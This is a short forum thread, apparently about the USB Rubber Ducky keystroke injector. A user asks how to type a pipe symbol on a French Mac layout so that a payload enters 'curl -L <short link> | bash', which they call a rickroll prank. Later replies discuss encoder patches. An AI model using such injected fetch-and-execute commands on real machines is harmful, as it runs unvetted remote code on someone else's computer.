WooK Posted January 5, 2014 Posted January 5, 2014 (edited) Hi Everyone, I'm trying to use a pipe symbol ( | ) on a french mac keyboard. The key combination to do it is Shift+Alt+L What I want to print in a terminal is : curl -L http://bit.ly/10hA8iC | bash (which by the way is really fun, it plays a rickroll inside the mac terminal ! ) All my script is working great, but the only issue is that pipe symbol. I've tried several things, like : STRING curl -L http://bit.ly/10hA8iC | bash or STRING curl -s -L http://bit.ly/10hA8iC SPACE DELAY 20 ALT-SHIFT l DELAY 20 SPACE DELAY 20 STRING bash DELAY 50 ENTER I saw a forum post saying that maybe the rubberducky can't handle 3 key combination, so I don't know... If anyone has an idea or at least the same pb... Maybe I'm missing something obvious here, so excuse me for my noobness (& my english ! ) Thanks a lot Wook Edited January 5, 2014 by WooK Quote
no42 Posted January 5, 2014 Posted January 5, 2014 some three-key-combos don't work, think this is an encoder issue. I've attempted to patch encoder.java in the svn (https://code.google.com/p/ducky-decode/source/browse/trunk/Encoder/v2/src/Encoder.java) If you would like to test it? Not sure if its working right as I don't know the proper packet sequence - I guessed. Quote
WooK Posted January 5, 2014 Author Posted January 5, 2014 I'll try it right now I'll tell you if it's working. Thanks ! Quote
carmelo42 Posted January 8, 2014 Posted January 8, 2014 I can't get french mac keyboard work ... I'm using this command to encode my text file : java -jar encoder.jar -l resources/fr.properties -i textedit.txt -o inject.bin any idea please ? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.